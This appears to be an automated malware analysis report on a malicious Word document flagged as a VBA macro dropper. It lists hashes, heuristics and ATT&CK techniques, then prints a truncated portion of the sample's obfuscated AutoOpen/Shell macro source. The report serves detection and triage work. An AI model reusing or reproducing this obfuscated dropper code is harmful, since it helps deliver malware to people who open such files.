Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1706fbe760eab15d…

MALICIOUS

Office (OLE)

181.0 KB Created: 2018-02-27 14:17:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: d2e69d8be678035ca493970d50bb5fcb SHA-1: b3fc77d5086f16330b011aab7da4190300166234 SHA-256: 1706fbe760eab15d7b66ce7af36c484b20553554010b0e99ea9aee7d291d6a8e
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The presence of an AutoOpen macro and a Shell() call strongly indicates that the macro is designed to execute arbitrary code. The ClamAV detection name 'Doc.Dropper.Agent' further suggests its role as a dropper for other malware. No specific family could be identified due to heavy obfuscation in the VBA script.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6458242-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6458242-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63291 bytes
SHA-256: 08e957607cdcca7adebaa2ecd4281ab3ee8c7e0ac2f0435db51b93efc18c4eff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "oXFzZmt"
Sub YLifjSNaN()
   On Error Resume Next
   Do While SzJFAu Xor EOUpHtdQwj
      Dim fSOazBViuZOp
      Do While wVmptvjXKT Or YZjRRBOl
         YvutrAIkRADq = 6025 - Atn(tslHoWCzR / CByte(7) + zuCaUERt + Hex(cDCBbsz)) + (171376742 / nwGKPdwfofKMs) * (5938624 * ChrW(520437311) + oGbvzoZnfAH * OVqrJOqiPwLJj)
      Loop
      DujYHjSu = 6025 - Atn(vZjtISA / CByte(7) + GDWPdozW + Hex(WNTpvRLikfGGsa)) + (171376742 / TGvRcVhLO) * (5938624 * ChrW(520437311) + FGNBaGjCLKF * aAHVLXntMN)
      Do
         wvWtftaoCE = qLwjKY * CDate(426718607 * Atn(EhQUsjvJH - Fix(JXVSrd * CDate(8832))) * GENDIlVC / CLng(5390)) / 9 - ChrB(8 - Cos(911)) / 83 + Int(QJwXiNPVI) / LbCqzVmQiij - ChrB(872) / whhaGLTvvvSWP + Chr(778 / Atn(48 * Round(NkivIzKLSoDN / CBool(2)))) / (1199 / CByte(hWVqXmZ * 8 + OpEHDCM * CDbl(39)))
      Loop Until QJjaMICmjWkj <= PtXswlZZEujp
      zuaoEzwaBi = mDZUiHBCt + wvjPHQnLL
   Loop
   Set wllJHMu = miMOOAFt
End Sub
Function UWUoQRtW()
On Error Resume Next
uqztU = "EjlP&CzrEvpShaFjlziTop"
DdwZEhc = NwmrUicYHQ = 6025 - Atn(jOiwY / CByte(7) + XjviiWMuJS + Hex(fskvphdhLwGH)) + (171376742 / tWTYQzBjFhDODt) * (5938624 * ChrW(520437311) + aZzKMrtOfI * jEONhQcwpMCnd)
BQPVvEj = QFZLhhl = 6025 - Atn(zHlzvuIzHoPW / CByte(7) + zRrzmlHD + Hex(YlTzwlTC)) + (171376742 / bIsFHciUhnpENX) * (5938624 * ChrW(520437311) + uSniMu * ikjizfwwWjEpoN)
ZPqDoAjhaAI = iuivbdfghnkjgyugjn(uqztU, 15, 4)
tILpKilTn = "VtAOIubrUw&&BuKnWjqZM=%hWBuPapmzh"
zGMwvfOTj = miSjCVS = 6025 - Atn(aoSkFArijOsOlm / CByte(7) + JDHrjfkWIS + Hex(mHAISD)) + (171376742 / SLTRjOkvjN) * (5938624 * ChrW(520437311) + KpczCJ * vdmQpSKRAOk)
rLPzicbE = XwplTaIrWtH = 6025 - Atn(wXQzddmErdWZ / CByte(7) + CWAGPNVKzpKVD + Hex(ZuRICW)) + (171376742 / RSCNo) * (5938624 * ChrW(520437311) + cfqtZPvRE * lHflZz)
pJIcZjcV = iuivbdfghnkjgyugjn(tILpKilTn, 5, 19)
STdVTqHvGwJ = "tjmMHwVNkVUtes&&eh=%5rav% tAFOLGVW "
bKccVEjQl = tBLUdpTisja = 6025 - Atn(bPwbYzXDGttNiG / CByte(7) + VAOlwNocOQX + Hex(EAPajsSasMMFL)) + (171376742 / TZAIwlWFz) * (5938624 * ChrW(520437311) + duclmmjKBDS * rSMVQ)
lSZlwQJEsqD = rJoJaduPcGS = 6025 - Atn(XwDhzlPjoFcB / CByte(7) + HCQhh + Hex(cVqOotTTzrWKcs)) + (171376742 / fUAJVbF) * (5938624 * ChrW(520437311) + rljmFTadhvL * QjkOodRQoRvzJ)
UHrRHjCDG = iuivbdfghnkjgyugjn(STdVTqHvGwJ, 9, 16)
fiVWDViz = "vrafanbwsafAIvqsm=%LhlrwfHwlAJLSfXjjkzOt"
CkzIWFcYR = RciocrzUw = 6025 - Atn(wWcOuhG / CByte(7) + flmHVfCT + Hex(MYzAHW)) + (171376742 / LWBOrTkW) * (5938624 * ChrW(520437311) + bcHTukTZPv * iKGwmIjkvzJqAJ)
NBFiIPdiPD = YjrZM = 6025 - Atn(PdtCu / CByte(7) + NbFXlMYkAPDcij + Hex(biRmHKqMnhpivS)) + (171376742 / MvrIWIqbYib) * (5938624 * ChrW(520437311) + DIdPqdCoz * QnpXPRqvdc)
AnfLjL = iuivbdfghnkjgyugjn(fiVWDViz, 8, 17)
XqlcB = "qcUkdlhToQIUTes&&CKkZbLpzSSS=%mLjbdwTWN"
lhTRhswcs = djGOwLSR = 6025 - Atn(hdEwom / CByte(7) + piajBWzOOhR + Hex(fbPUums)) + (171376742 / LBMriRAZbfMSmP) * (5938624 * ChrW(520437311) + AMEQGisAQuG * jRJKMwnVoWiE)
uIjFwXaj = VXmiVzZQtPH = 6025 - Atn(VlPTAwzYjUHSV / CByte(7) + Vwtud + Hex(zjkLFSuvjU)) + (171376742 / CBUqLYCnakjD) * (5938624 * ChrW(520437311) + PUMVd * XzlcqpAENi)
nDSjH = iuivbdfghnkjgyugjn(XqlcB, 10, 17)
rTSkM = "MXirwcsYKBsDI% tesXERHsuTjhUM"
nrnzimMk = uNzCQvipGot = 6025 - Atn(NbwwAdZ / CByte(7) + MnCSviqC + Hex(rbBXtjOkk)) + (171376742 / wHBQUGwoajMfHq) * (5938624 * ChrW(520437311) + VGLjHlEf * PNsnTshN)
zHECjVpwJB = faMKWiM = 6025 - Atn(qQTLLTLFXcDEcM / CByte(7) + ckBGOIUhBzQcP + Hex(LkcUJv)) + (171376742 / LFDthhvQiJmT) * (5938624 * ChrW(520437311) + jZVbzpViSLv * wAMrajTQFRizN)
EGVvpluBuO = iuivbdfghnkjgyugjn(rTSkM, 12, 6)
mhIhnN = "GjQCies&&!%2rav%BuzhXGipYho"
hICtWOwwOc = fNRLctKjEVVHWc = 6025 - Atn(GZGbj / CByte(7) + lGwOJbLwmYqf + Hex(nDtwiJfGikiVSU)) + (171376742 / jzQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.